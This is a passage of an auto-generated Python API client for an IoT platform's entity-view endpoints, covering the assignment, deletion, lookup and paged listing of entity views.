returns the request thread.
"""
all_params = ['customer_id', 'entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_entity_view_to_customer_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `assign_entity_view_to_customer_using_post`") # noqa: E501
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_customer_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/{customerId}/entityView/{entityViewId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_entity_view_to_edge_using_post(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Assign entity view to edge (assignEntityViewToEdge) # noqa: E501
Creates assignment of an existing entity view to an instance of The Edge. Assignment works in async way - first, notification event pushed to edge service queue on platform. Second, remote edge service will receive a copy of assignment entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once entity view will be delivered to edge service, it's going to be available for usage on remote edge instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_edge_using_post(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
return data
def assign_entity_view_to_edge_using_post_with_http_info(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Assign entity view to edge (assignEntityViewToEdge) # noqa: E501
Creates assignment of an existing entity view to an instance of The Edge. Assignment works in async way - first, notification event pushed to edge service queue on platform. Second, remote edge service will receive a copy of assignment entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once entity view will be delivered to edge service, it's going to be available for usage on remote edge instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_edge_using_post_with_http_info(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['edge_id', 'entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_entity_view_to_edge_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'edge_id' is set
if ('edge_id' not in params or
params['edge_id'] is None):
raise ValueError("Missing the required parameter `edge_id` when calling `assign_entity_view_to_edge_using_post`") # noqa: E501
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_edge_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'edge_id' in params:
path_params['edgeId'] = params['edge_id'] # noqa: E501
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/edge/{edgeId}/entityView/{entityViewId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_entity_view_to_public_customer_using_post(self, entity_view_id, **kwargs): # noqa: E501
"""Make entity view publicly available (assignEntityViewToPublicCustomer) # noqa: E501
Entity View will be available for non-authorized (not logged-in) users. This is useful to create dashboards that you plan to share/embed on a publicly available website. However, users that are logged-in and belong to different tenant will not be able to access the entity view. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_public_customer_using_post(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
def assign_entity_view_to_public_customer_using_post_with_http_info(self, entity_view_id, **kwargs): # noqa: E501
"""Make entity view publicly available (assignEntityViewToPublicCustomer) # noqa: E501
Entity View will be available for non-authorized (not logged-in) users. This is useful to create dashboards that you plan to share/embed on a publicly available website. However, users that are logged-in and belong to different tenant will not be able to access the entity view. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_public_customer_using_post_with_http_info(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_entity_view_to_public_customer_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `assign_entity_view_to_public_customer_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/public/entityView/{entityViewId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_entity_view_using_delete(self, entity_view_id, **kwargs): # noqa: E501
"""Delete entity view (deleteEntityView) # noqa: E501
Delete the EntityView object based on the provided entity view id. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_entity_view_using_delete(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_entity_view_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.delete_entity_view_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
def delete_entity_view_using_delete_with_http_info(self, entity_view_id, **kwargs): # noqa: E501
"""Delete entity view (deleteEntityView) # noqa: E501
Delete the EntityView object based on the provided entity view id. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_entity_view_using_delete_with_http_info(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_view_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_entity_view_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_view_id' is set
if ('entity_view_id' not in params or
params['entity_view_id'] is None):
raise ValueError("Missing the required parameter `entity_view_id` when calling `delete_entity_view_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_view_id' in params:
path_params['entityViewId'] = params['entity_view_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityView/{entityViewId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_by_query_using_post4(self, **kwargs): # noqa: E501
"""Find related entity views (findByQuery) # noqa: E501
Returns all entity views that are related to the specific entity. The entity id, relation type, entity view types, depth of the search, and other query parameters defined using complex 'EntityViewSearchQuery' object. See 'Model' tab of the Parameters for more info. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_by_query_using_post4(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityViewSearchQuery body:
:return: list[EntityView]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_by_query_using_post4_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_by_query_using_post4_with_http_info(**kwargs) # noqa: E501
return data
def find_by_query_using_post4_with_http_info(self, **kwargs): # noqa: E501
"""Find related entity views (findByQuery) # noqa: E501
Returns all entity views that are related to the specific entity. The entity id, relation type, entity view types, depth of the search, and other query parameters defined using complex 'EntityViewSearchQuery' object. See 'Model' tab of the Parameters for more info. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_by_query_using_post4_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityViewSearchQuery body:
:return: list[EntityView]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_by_query_using_post4" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityViews', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EntityView]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_entity_view_infos_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity View info (getCustomerEntityViewInfos) # noqa: E501
Returns a page of Entity View info objects assigned to customer. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_view_infos_using_get(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-<PASSWORD>ff<PASSWORD>' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
return data
def get_customer_entity_view_infos_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity View info (getCustomerEntityViewInfos) # noqa: E501
Returns a page of Entity View info objects assigned to customer. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_view_infos_using_get_with_http_info(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityViewInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_entity_view_infos_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_customer_entity_view_infos_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/{customerId}/entityViewInfos{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityViewInfo', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_entity_views_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity Views (getCustomerEntityViews) # noqa: E501
Returns a page of Entity View objects assigned to customer. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_views_using_get(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-<PASSWORD>-<PASSWORD>ff<PASSWORD>' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501
return data
def get_customer_entity_views_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501
"""Get Customer Entity Views (getCustomerEntityViews) # noqa: E501
Returns a page of Entity View objects assigned to customer. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_entity_views_using_get_with_http_info(customer_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_entity_views_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_entity_views_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_customer_entity_views_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_customer_entity_views_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
query_params = []
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/{customerId}/entityViews{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_edge_entity_views_using_get(self, edge_id, page, page_size, **kwargs): # noqa: E501
"""getEdgeEntityViews # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_edge_entity_views_using_get(edge_id, page, page_size, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str page: page (required)
:param str page_size: pageSize (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:param int start_time: startTime
:param int end_time: endTime
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_edge_entity_views_using_get_with_http_info(edge_id, page, page_size, **kwargs) # noqa: E501
else:
(data) = self.get_edge_entity_views_using_get_with_http_info(edge_id, page, page_size, **kwargs) # noqa: E501
return data
def get_edge_entity_views_using_get_with_http_info(self, edge_id, page, page_size, **kwargs): # noqa: E501
"""getEdgeEntityViews # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_edge_entity_views_using_get_with_http_info(edge_id, page, page_size, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str page: page (required)
:param str page_size: pageSize (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:param int start_time: startTime
:param int end_time: endTime
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['edge_id', 'page', 'page_size', 'type', 'text_search', 'sort_property', 'sort_order', 'start_time', 'end_time'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_edge_entity_views_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'edge_id' is set
if ('edge_id' not in params or
params['edge_id'] is None):
raise ValueError("Missing the required parameter `edge_id` when calling `get_edge_entity_views_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_edge_entity_views_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_edge_entity_views_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'edge_id' in params:
path_params['edgeId'] = params['edge_id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/edge/{edgeId}/entityViews{?endTime,page,pageSize,sortOrder,sortProperty,startTime,textSearch,type}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataEntityView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_entity_view_by_id_using_get(self, entity_view_id, **kwargs): # noqa: E501
"""Get entity view (getEntityViewById) # noqa: E501
Fetch the EntityView object based on the provided entity view id. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_entity_view_by_id_using_get(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_entity_view_by_id_using_get_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.get_entity_view_by_id_using_get_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
def get_entity_view_by_id_using_get_with_http_info(self, entity_view_id, **kwargs): # noqa: E501
"""Get entity view (getEntityViewById) # noqa: E501
Fetch the EntityView object based on the provided entity view id. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
